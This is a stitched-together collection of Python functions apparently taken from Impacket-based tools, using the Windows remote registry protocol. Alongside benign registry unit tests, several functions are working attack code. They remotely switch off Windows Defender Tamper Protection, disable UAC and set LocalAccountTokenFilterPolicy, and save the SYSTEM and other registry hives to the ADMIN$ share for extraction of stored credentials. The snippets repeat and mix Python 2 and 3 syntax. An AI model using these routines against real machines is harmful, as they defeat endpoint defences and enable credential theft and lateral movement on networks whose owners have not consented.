def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self): dce, rpctransport, phKey = self.connect() resp = rrp.hOpenClassesRoot(dce) resp.dump() regHandle = resp['phKey'] resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00') resp.dump() phKey = resp['phkResult'] try: resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00') resp.dump() except Exception as e: print(e) type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00') #print data resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00') resp.dump() resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00') resp.dump() self.assertTrue('HOLA COMO TE VA\x00' == data)
def __retrieve_hive(self, hive_name): temp_filename = '%s' % ''.join( [random.choice(string.letters) for i in range(8)]) ans = rrp.hOpenLocalMachine(self.__rrp) regHandle = ans['phKey'] try: ans = rrp.hBaseRegCreateKey(self.__rrp, regHandle, hive_name) except: raise registryKey('Cannot open %s hive' % hive_name) logger.debug('Saving %s hive to %s' % (hive_name, temp_filename)) keyHandle = ans['phkResult'] resp = rrp.hBaseRegSaveKey(self.__rrp, keyHandle, temp_filename) rrp.hBaseRegCloseKey(self.__rrp, keyHandle) rrp.hBaseRegCloseKey(self.__rrp, regHandle) # Open the temporary remote file, so it can be read later # remote_fp = RemoteFile(self.smb, ntpath.join('\\', temp_filename), share=DataStore.writable_share) remote_fp = RemoteFile(self.smb, ntpath.join('System32', temp_filename), share='ADMIN$') return remote_fp
def disableTamper(self, dce): # try: ans = rrp.hOpenLocalMachine( dce) # gets handle for HKEY_LOCAL_MACHINE regHandle = ans['phKey'] except Exception as e: logging.debug('Exception thrown when hOpenLocalMachine: %s', str(e)) return try: resp = rrp.hBaseRegCreateKey( dce, regHandle, 'SOFTWARE\\Microsoft\\Windows Defender\\Features') keyHandle = resp['phkResult'] except Exception as e: logging.debug('Exception thrown when hBaseRegCreateKey: %s', str(e)) return # TamperProtection try: resp = rrp.hBaseRegSetValue(dce, keyHandle, 'TamperProtection\x00', rrp.REG_DWORD, 0) self.logger.highlight( 'TamperProtection Key Set! TamperProtection is now off!') except Exception as e: logging.debug( 'Exception thrown when hBaseRegSetValue EnableLUA: %s', str(e)) self.logger.error('Could not set TamperProtection Key') pass
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self): dce, rpctransport, phKey = self.connect() resp = rrp.hOpenClassesRoot(dce) resp.dump() regHandle = resp['phKey'] resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00') resp.dump() phKey = resp['phkResult'] try: resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00') resp.dump() except Exception as e: print e type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00') #print data resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00') resp.dump() resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00') resp.dump() self.assertTrue( 'HOLA COMO TE VA\x00' == data )
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self): dce, rpctransport = self.connect() resp = rrp.hOpenClassesRoot(dce) resp.dump() regHandle = resp['phKey'] resp = rrp.hBaseRegCreateKey(dce, regHandle, self.test_key) resp.dump() phKey = resp['phkResult'] try: resp = rrp.hBaseRegSetValue(dce, phKey, self.test_value_name, rrp.REG_SZ, self.test_value_data) resp.dump() except Exception as e: print(e) type, data = rrp.hBaseRegQueryValue(dce, phKey, self.test_value_name) resp = rrp.hBaseRegDeleteValue(dce, phKey, self.test_value_name) resp.dump() resp = rrp.hBaseRegDeleteKey(dce, regHandle, self.test_key) resp.dump() self.assertEqual(self.test_value_data, data)
def add(self, dce, keyName): hRootKey, subKey = self.__strip_root_key(dce, keyName) # READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY should be equal to KEY_WRITE (0x20006) if self.__options.v is None: # Try to create subkey subKeyCreate = subKey subKey = '\\'.join(subKey.split('\\')[:-1]) ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey, samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY) # Should I use ans2? ans3 = rrp.hBaseRegCreateKey( dce, hRootKey, subKeyCreate, samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY ) if ans3['ErrorCode'] == 0: print('Successfully set subkey %s' % ( keyName )) else: print('Error 0x%08x while creating subkey %s' % ( ans3['ErrorCode'], keyName )) else: # Try to set value of key ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey, samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY) dwType = getattr(rrp, self.__options.vt, None) if dwType is None or not self.__options.vt.startswith('REG_'): raise Exception('Error parsing value type %s' % self.__options.vt) #Fix (?) for packValue function if dwType in ( rrp.REG_DWORD, rrp.REG_DWORD_BIG_ENDIAN, rrp.REG_DWORD_LITTLE_ENDIAN, rrp.REG_QWORD, rrp.REG_QWORD_LITTLE_ENDIAN ): valueData = int(self.__options.vd) else: valueData = self.__options.vd ans3 = rrp.hBaseRegSetValue( dce, ans2['phkResult'], self.__options.v, dwType, valueData ) if ans3['ErrorCode'] == 0: print('Successfully set key %s\\%s of type %s to value %s' % ( keyName, self.__options.v, self.__options.vt, valueData )) else: print('Error 0x%08x while setting key %s\\%s of type %s to value %s' % ( ans3['ErrorCode'], keyName, self.__options.v, self.__options.vt, valueData ))
def __retrieveHive(self, hiveName): tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp' ans = rrp.hOpenLocalMachine(self.__rrp) regHandle = ans['phKey'] try: ans = rrp.hBaseRegCreateKey(self.__rrp, regHandle, hiveName) except: raise Exception("Can't open %s hive" % hiveName) keyHandle = ans['phkResult'] rrp.hBaseRegSaveKey(self.__rrp, keyHandle, tmpFileName) rrp.hBaseRegCloseKey(self.__rrp, keyHandle) rrp.hBaseRegCloseKey(self.__rrp, regHandle) # Now let's open the remote file, so it can be read later remoteFileName = RemoteFile(self.__smbConnection, 'SYSTEM32\\'+tmpFileName) return remoteFileName
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self): dce, rpctransport, phKey = self.connect() resp = rrp.hOpenClassesRoot(dce) #resp.dump() regHandle = resp['phKey'] resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00') #resp.dump() phKey = resp['phkResult'] try: resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00') #resp.dump() except Exception, e: print e
def enableUAC(self, dce): # this actually disables UAC but the key is enable.... try: ans = rrp.hOpenLocalMachine(dce) regHandle = ans['phKey'] except Exception as e: logging.debug('Exception thrown when hOpenLocalMachine: %s', str(e)) return try: resp = rrp.hBaseRegCreateKey( dce, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' ) keyHandle = resp['phkResult'] except Exception as e: logging.debug('Exception thrown when hBaseRegCreateKey: %s', str(e)) return # EnableLUA try: resp = rrp.hBaseRegSetValue(dce, keyHandle, 'EnableLUA\x00', rrp.REG_DWORD, 0) self.logger.highlight('EnableLUA Key Set!') except Exception as e: logging.debug( 'Exception thrown when hBaseRegSetValue EnableLUA: %s', str(e)) self.logger.error('Could not set EnableLUA Key') pass # LocalAccountTokenFilterPolicy try: resp = rrp.hBaseRegSetValue(dce, keyHandle, 'LocalAccountTokenFilterPolicy\x00', rrp.REG_DWORD, 1) self.logger.highlight('LocalAccountTokenFilterPolicy Key Set!') except Exception as e: logging.debug( 'Exception thrown when hBaseRegSetValue LocalAccountTokenFilterPolicy: %s', str(e)) self.logger.error( 'Could not set LocalAccountTokenFilterPolicy Key') return
def checkTamper(self, dce): # try: ans = rrp.hOpenLocalMachine( dce) # gets handle for HKEY_LOCAL_MACHINE regHandle = ans['phKey'] except Exception as e: logging.debug('Exception thrown when hOpenLocalMachine: %s', str(e)) return try: resp = rrp.hBaseRegCreateKey( dce, regHandle, 'SOFTWARE\\Microsoft\\Windows Defender\\Features') keyHandle = resp['phkResult'] except Exception as e: logging.debug('Exception thrown when hBaseRegCreateKey: %s', str(e)) return # TamperProtection try: dataType, tp_value = rrp.hBaseRegQueryValue( dce, keyHandle, 'TamperProtection') except Exception as e: logging.debug('Exception thrown when hBaseRegQueryValue: %s', str(e)) tp_value = 5 pass if tp_value == 5: self.logger.highlight('TamperProtection = 5 (its on) ') else: self.logger.highlight( 'TamperProtection = {} (less than 5 is good)'.format( tp_value))